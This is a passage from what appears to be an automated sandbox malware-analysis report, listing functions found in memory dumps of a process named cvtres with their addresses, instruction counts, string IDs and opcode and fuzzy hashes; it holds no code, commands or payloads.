                                                          Function 06A521D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHcq
                                                          • API String ID: 0-4245845256
                                                          • Opcode ID: e881292a9adf3e6d51c63be78278656b6a8fedeef35a29232c618b83e64e8705
                                                          • Instruction ID: c6d9b165435da357d2fc28356f91e9656b70ab7d7b8027ba6fa6d6f6e7b58da1
                                                          • Opcode Fuzzy Hash: e881292a9adf3e6d51c63be78278656b6a8fedeef35a29232c618b83e64e8705
                                                          • Instruction Fuzzy Hash: 5A31DE30B102019FDB59EB74C5547AE7BE2AF88200F618878D806EB394DF39DE41CBA1
                                                          Function 06A582B8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq
                                                          • API String ID: 0-2110363268
                                                          • Opcode ID: 61208b43b7f0b12220305e474d12a0d30fddaa08bed4e85d2ef99644af63a2f4
                                                          • Instruction ID: 8e93a1806878f128eddf4a17b99330f560fd5c815d62caf35bf004859b979c8c
                                                          • Opcode Fuzzy Hash: 61208b43b7f0b12220305e474d12a0d30fddaa08bed4e85d2ef99644af63a2f4
                                                          • Instruction Fuzzy Hash: 15F08C32B04221DBDF68FF54E9802B9B7A1EB50224F164879DD05DB251DB3DDD05CB90
                                                          Function 06A561D8 Relevance: .2, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f5dfefe4c6d5de5503b4ef6f2b474ff68856115e7a53ba5337272bd76142ffa
                                                          • Instruction ID: 4fa468852b2bc6990d61173c527513549cc306e1983c5cc11cebe41bdb3f9018
                                                          • Opcode Fuzzy Hash: 8f5dfefe4c6d5de5503b4ef6f2b474ff68856115e7a53ba5337272bd76142ffa
                                                          • Instruction Fuzzy Hash: BC61A0B1F001214FCB55EB6AC88466FBAE7AFD4220B554479E80EDB364DE7ADC0287D1
                                                          Function 06A54291 Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e2078dde445224c7452037155f09b1effe87b0f303893c3d2ff05cea259b40e
                                                          • Instruction ID: b09b16eb544e5888a1f2d0733bd7f38d97ca621579abe8fd71f057ef0078ab1d
                                                          • Opcode Fuzzy Hash: 8e2078dde445224c7452037155f09b1effe87b0f303893c3d2ff05cea259b40e
                                                          • Instruction Fuzzy Hash: 15813C31B002059BDB54EFA9D5547AEB7F2EF88310F118538E80AEB354EB34DC828B91
                                                          Function 06A545B0 Relevance: .2, Instructions: 220COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a9fa0e8460d59a1a8ab0ae065c45537522b63dc9d545ecb17fc0e27356257b51
                                                          • Instruction ID: b50319bcd7df8e6a2be82a8e48a87ddb17c725a66893a259009597496faccc6c
                                                          • Opcode Fuzzy Hash: a9fa0e8460d59a1a8ab0ae065c45537522b63dc9d545ecb17fc0e27356257b51
                                                          • Instruction Fuzzy Hash: 95915C30E006198BDF60DF68C890B9DB7B1FF89304F208599D449BB295DB70AE85CF91
                                                          Function 06A545C8 Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 274533f6701c2a6e06add9de7d175bce3e8bb6dbd32e04f7389a227677aeeaa7
                                                          • Instruction ID: 71a1a3294de527d7f100919c536cd548624f40aa0e2ce2593f82ccfcd44e09f3
                                                          • Opcode Fuzzy Hash: 274533f6701c2a6e06add9de7d175bce3e8bb6dbd32e04f7389a227677aeeaa7
                                                          • Instruction Fuzzy Hash: F7913A30E1061A8BDF60DF68C880B9DB7B1FF89314F208599D549AB295DB70AE85CF91
                                                          Function 06A5EB00 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 82891b53045fb2c6f7287ce7349afa56441f46f137cb121089fb93157f27da5a
                                                          • Instruction ID: 8e4b73a871827f79168862ce9bddf58f236bffd7506d0b09c8527bbcd2fed8c4
                                                          • Opcode Fuzzy Hash: 82891b53045fb2c6f7287ce7349afa56441f46f137cb121089fb93157f27da5a
                                                          • Instruction Fuzzy Hash: 98713B71A002099FDB54EFA8D980AADBBF6FF88300F158529E419EB355DB34ED46CB40
                                                          Function 06A5EB10 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af9e1e1c17198a44fcc92022c12dd5dd7d1bc99734244ee5c1d4140029104ece
                                                          • Instruction ID: 4934420a51969daa1e59c622ab785f5428157d346cb9f444dab0232527197152
                                                          • Opcode Fuzzy Hash: af9e1e1c17198a44fcc92022c12dd5dd7d1bc99734244ee5c1d4140029104ece
                                                          • Instruction Fuzzy Hash: F5712C71A002099FDB54EFA9C980AADBBF6FF88300F158429E419EB355DB34ED46CB40
                                                          Function 06A5FB9F Relevance: .2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a73117516b5052b5ab074959e1cf758c91aa6fa568e69cf2b8e0ae1f056b109
                                                          • Instruction ID: 7a2f1bf42a260821dc83a42a24a12b2ddb342b5f424d6eee97927931564df708
                                                          • Opcode Fuzzy Hash: 7a73117516b5052b5ab074959e1cf758c91aa6fa568e69cf2b8e0ae1f056b109
                                                          • Instruction Fuzzy Hash: CB51DE32E01109AFDB14EB78E4886AEBBB2FF84315F118839E906DB254DB359845CB81
                                                          Function 06A5F960 Relevance: .2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a04a9cfa482ce6993f0805ff80bf26e870cfb8cad5d22ff22e43f1333db832f4
                                                          • Instruction ID: 29d7ef33da53d56ef56ad3c0449ca16733fa845a962ff63476871bf4fc4c9655
                                                          • Opcode Fuzzy Hash: a04a9cfa482ce6993f0805ff80bf26e870cfb8cad5d22ff22e43f1333db832f4
                                                          • Instruction Fuzzy Hash: 1C51A5B0B202149FEF64ABBCD85472E269AE78D351F214439DA0ED7395CE7CCC415B92
                                                          Function 06A55409 Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6925caec6d5d506795259f7e3f1fb31cf4d5ca7f829306901f2ef657d4fcc6c7
                                                          • Instruction ID: a0506e1cd0cb6b42290b1e7ff60c1acaaea075e770735320b0efa8476639faf8
                                                          • Opcode Fuzzy Hash: 6925caec6d5d506795259f7e3f1fb31cf4d5ca7f829306901f2ef657d4fcc6c7
                                                          • Instruction Fuzzy Hash: 07415E71E006098FDF70DFA9D880AAFBBF2EF84311F11492AE556DB650D330E9558B91
                                                          Function 06A55588 Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4fdc29aad98812da7b9add19195eae0e024d212fb73af1596fa900f60b1f36cd
                                                          • Instruction ID: 78cf761d864f835cd4e47c02f9f2d860d266c200a9eb0d8ad57421b5ef8f3154
                                                          • Opcode Fuzzy Hash: 4fdc29aad98812da7b9add19195eae0e024d212fb73af1596fa900f60b1f36cd
                                                          • Instruction Fuzzy Hash: 2941E130E1060A9BDF64EF68C880B7EF7B2FB85310F25892AE915DB680C635D841CBC1
                                                          Function 06A52090 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce669534385cbd502b6a05979859d4031d028dd543a59b569b1077b8e854a43a
                                                          • Instruction ID: 63bec36659d32caaa42607e2167c6c18ac3c40a110b1387fd3183e239b80e5e5
                                                          • Opcode Fuzzy Hash: ce669534385cbd502b6a05979859d4031d028dd543a59b569b1077b8e854a43a
                                                          • Instruction Fuzzy Hash: 3B318C31E1020A9BCB59DF65C994B9EB7B2FF89300F108529E906EB354DB71ED46CB50
                                                          Function 06A5208D Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca03ba1e9a5c1343206736394c284dafad383c500b1bc0bffb73bf8e8865efc8
                                                          • Instruction ID: f8c7509dfa23d65c42b8c77619fc7e4394006a158bf29985d4fe26d799377c8b
                                                          • Opcode Fuzzy Hash: ca03ba1e9a5c1343206736394c284dafad383c500b1bc0bffb73bf8e8865efc8
                                                          • Instruction Fuzzy Hash: 66318C31E1020A9BCB59DF64C994B9EB7B2BF89300F108529E906EB354DB71ED46CB50
                                                          Function 06A53A90 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6696fc8e674e345a72a06eb7ad8c85636d970cee96d8473b552d50baf07e6b7f
                                                          • Instruction ID: 625d9e1f557855d1b3d7bb7cbfc7f7badc2d6d9009a9fbbf21ade2f9d4671531
                                                          • Opcode Fuzzy Hash: 6696fc8e674e345a72a06eb7ad8c85636d970cee96d8473b552d50baf07e6b7f
                                                          • Instruction Fuzzy Hash: 8B218D72A01205AFDB40EF69D980AEEBBB5EB88710F118025E905E7355EB35DC018B90
                                                          Function 06A53AA0 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74f2089634f1123b1a3432a0f2ee6577a503cc4106fb969bc45a0a59f5d925e9
                                                          • Instruction ID: cb55d86b5d0cdf5020b9add1306cea627867c52ff1fc4f336607177beb854af2
                                                          • Opcode Fuzzy Hash: 74f2089634f1123b1a3432a0f2ee6577a503cc4106fb969bc45a0a59f5d925e9
                                                          • Instruction Fuzzy Hash: 3C219F72F016159FDF40EF69D980AAEB7F1EB88650F118035E905E7355EB35DC008B90
                                                          Function 012CD20C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150224208.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_12cd000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b2648d328d63724180df3963e4971c58ecc5c8bc8e934b9849c48688c543243
                                                          • Instruction ID: 2f86fd030b37941e3cd3c831f244f2983db5425f1206b1a84029e165a6e66f9f
                                                          • Opcode Fuzzy Hash: 1b2648d328d63724180df3963e4971c58ecc5c8bc8e934b9849c48688c543243
                                                          • Instruction Fuzzy Hash: 5221D7715142499FDB01DF58D9C4B26BB66FB84734F24C77DDA4A0B243C376D406C6A2
                                                          Function 012CD044 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150224208.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_12cd000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71a678b92be95f405807b8de1c247a0360c3935cc86abb8d2c322dd496e2f4c4
                                                          • Instruction ID: 7c7096683eb698bd15085fa0298d41d16d5dd2efd819adbc327059a97117c18b
                                                          • Opcode Fuzzy Hash: 71a678b92be95f405807b8de1c247a0360c3935cc86abb8d2c322dd496e2f4c4
                                                          • Instruction Fuzzy Hash: 962125716142089FCB11DF68C8C4B26BBA5FB84714F20CA7DEA4A0B342C777D446CAA1
                                                          Function 012CD3BC Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150224208.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_12cd000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2cc7997568b48d8647c64e913c3ef166859ab5a21d68e52c61f9452e937ccec9
                                                          • Instruction ID: e97d38c42dd8a517001e82e3417936ee801a8cf9b65de543cfba036f99385e31
                                                          • Opcode Fuzzy Hash: 2cc7997568b48d8647c64e913c3ef166859ab5a21d68e52c61f9452e937ccec9
                                                          • Instruction Fuzzy Hash: 3E210375614208DFCB11DF58D8C4B26FBA5FB84714F20C67DDB0A4B282C376E446CAA1
                                                          Function 06A53BB0 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 374188e3ea9b75a96bbfdbd081a382428b0f9225573ce09fcc2a8219192ed76d
                                                          • Instruction ID: 095671ed57414031fa9bc7ff2eb436d9b136ad1dbd18510f2ae1eeb7abfd0fb8
                                                          • Opcode Fuzzy Hash: 374188e3ea9b75a96bbfdbd081a382428b0f9225573ce09fcc2a8219192ed76d
                                                          • Instruction Fuzzy Hash: 5011A132B005294FDF54EA68CD546AE73AAEBC8650F058539D80AEB344EF74EC068BD1
                                                          Function 06A541F0 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ea86df84e52e6c5a7a9107afb0f9d4f2281af9e87a74b53462a5d44093a3c60
                                                          • Instruction ID: ff383b7de2e86e41597ad1713df9189204fcab37a55ece9210ff866eec69faeb
                                                          • Opcode Fuzzy Hash: 5ea86df84e52e6c5a7a9107afb0f9d4f2281af9e87a74b53462a5d44093a3c60
                                                          • Instruction Fuzzy Hash: E901F531B001200FDB61E6AD941472EB7DBDBC9710F10847AE90ECB345ED71DC824391
                                                          Function 06A53BA0 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ddf5769df4a74e7942965451d77a4f0d7d86987ee56a981a7cb951c29bef0b7a
                                                          • Instruction ID: 044d67462f945215f9e1e8b308acbda873f111c527dbc1031567a07c8349a192
                                                          • Opcode Fuzzy Hash: ddf5769df4a74e7942965451d77a4f0d7d86987ee56a981a7cb951c29bef0b7a
                                                          • Instruction Fuzzy Hash: 3D01D436B100192BDF54EA6DDD14BEB32ABDBC8650F014539E806E7240EF74DC0647E2
                                                          Function 06A53868 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6709412c67a4d7143b7880564a244ac4396e5227b19d83744e8342b44a34cdf
                                                          • Instruction ID: cbf58d6825a36ae041f0b11e1a8d368069dfd9d558921cbd584844444fff6d1a
                                                          • Opcode Fuzzy Hash: c6709412c67a4d7143b7880564a244ac4396e5227b19d83744e8342b44a34cdf
                                                          • Instruction Fuzzy Hash: 5921CEB1D01259AFCB10DF9AD884A9EFBB4FB49320F10812AE918A7241D774A954CFA5
                                                          Function 06A5ED81 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c43cb0570ab6883c605e4e19ab57871c3701274b86073429f3f67031c86f988
                                                          • Instruction ID: bf89ca88cd99941183a838db889716494e6e39ec46e75ae89bf71cf75963d23f
                                                          • Opcode Fuzzy Hash: 1c43cb0570ab6883c605e4e19ab57871c3701274b86073429f3f67031c86f988
                                                          • Instruction Fuzzy Hash: FE012831B146101BCB24E73C9884B6B77DBEBC9620F008839E94BCB344DE30EC024395
                                                          Function 012CD207 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150224208.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_12cd000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                          • Instruction ID: ec9c194ebef8e5672db3f1f6728fc32519a4bf64982a3b84b94ef660c7f19c06
                                                          • Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                          • Instruction Fuzzy Hash: 8F11DD76504288DFDB02CF54D5C4B16BB62FB84624F24C6AEDA490B647C33AD40ACBA2
                                                          Function 012CD03F Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150224208.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_12cd000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                          • Instruction ID: 62946f83b0cf3577463bd30a7bf9731c76bf69dd8418764d8e684b4c68496272
                                                          • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                          • Instruction Fuzzy Hash: 7A11BE75504284CFDB12CF58C9C4B15BB72FB84714F24C6ADDA494B652C33AD44ACB91
                                                          Function 012CD3B7 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4150224208.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_12cd000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                          • Instruction ID: bc4c5bd2b6da2b38c0d2a990929058c8791875716f99228940bb9c075a0ac635
                                                          • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                          • Instruction Fuzzy Hash: 1D11BE75504284CFDB12CF54D5C4B15FB72FB44614F24C6ADDA494B256C33AE44ACB91
                                                          Function 06A53870 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e422088192559f7cd7bc7a8615eb8e9a3f799f0b35e8cee46031fbdeb5765892
                                                          • Instruction ID: 1ce0f453c514b09714cd6769d02c21796674c3d5db1d9c57b6fac26204195def
                                                          • Opcode Fuzzy Hash: e422088192559f7cd7bc7a8615eb8e9a3f799f0b35e8cee46031fbdeb5765892
                                                          • Instruction Fuzzy Hash: 1111D0B1D01259AFCB00DF9AD884ACEFFB4FB49310F10812AE918A7240D374A954CFA5
                                                          Function 06A54200 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbac97673c630e4f6bc556bd0db64b00716de8324fa3a01d4a7e8bed44c98cf7
                                                          • Instruction ID: 777c670faa9a9b783f69f271047b37fa60c426dd14d903b78f90aad18b2ca77f
                                                          • Opcode Fuzzy Hash: cbac97673c630e4f6bc556bd0db64b00716de8324fa3a01d4a7e8bed44c98cf7
                                                          • Instruction Fuzzy Hash: 1F016D31B101211BDBA4E6ADA46472FB3DADBC9721F108839E90ECB358ED75DC824795
                                                          Function 06A5ED90 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c4ac4a36463db0a579aef3a0813243806de4dba809fee5f20d0989938835ea8
                                                          • Instruction ID: 7624d0d36ec5590576550714a16ef140231f2400c76efa9164cb5e81016d931f
                                                          • Opcode Fuzzy Hash: 7c4ac4a36463db0a579aef3a0813243806de4dba809fee5f20d0989938835ea8
                                                          • Instruction Fuzzy Hash: 6501AF72B101115BDB64E62D9498B2E73DBEBC9720F118839E90BCB344EE35DD024785
                                                          Function 06A5A300 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd5f2fcd5733bc792f04513388214d597bb4b5219fba19bbb0eb1d5dc7558591
                                                          • Instruction ID: 0294d877b697030651b7bca1feb8f13a5d57ebea1fe0a5b44859599763ca33cd
                                                          • Opcode Fuzzy Hash: fd5f2fcd5733bc792f04513388214d597bb4b5219fba19bbb0eb1d5dc7558591
                                                          • Instruction Fuzzy Hash: 2D018135B106115BDB64EB6CD894B2EB3D6EB89624F108938EA0BCB754EA39DC418780
                                                          Function 06A5A2FD Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93ee2a9912f19003e47012123f33d8488369821c97a8477bce023e7993358571
                                                          • Instruction ID: d82ac6dada9a2ddaa166e7e89a3c0d95769f9c2b67d1dbd9d15bc58882fe8fef
                                                          • Opcode Fuzzy Hash: 93ee2a9912f19003e47012123f33d8488369821c97a8477bce023e7993358571
                                                          • Instruction Fuzzy Hash: D5018135B106114FDB64EB6CD894B6EB3D6EB89724F108938E60BCB754EA39DC418780
                                                          Function 06A56460 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
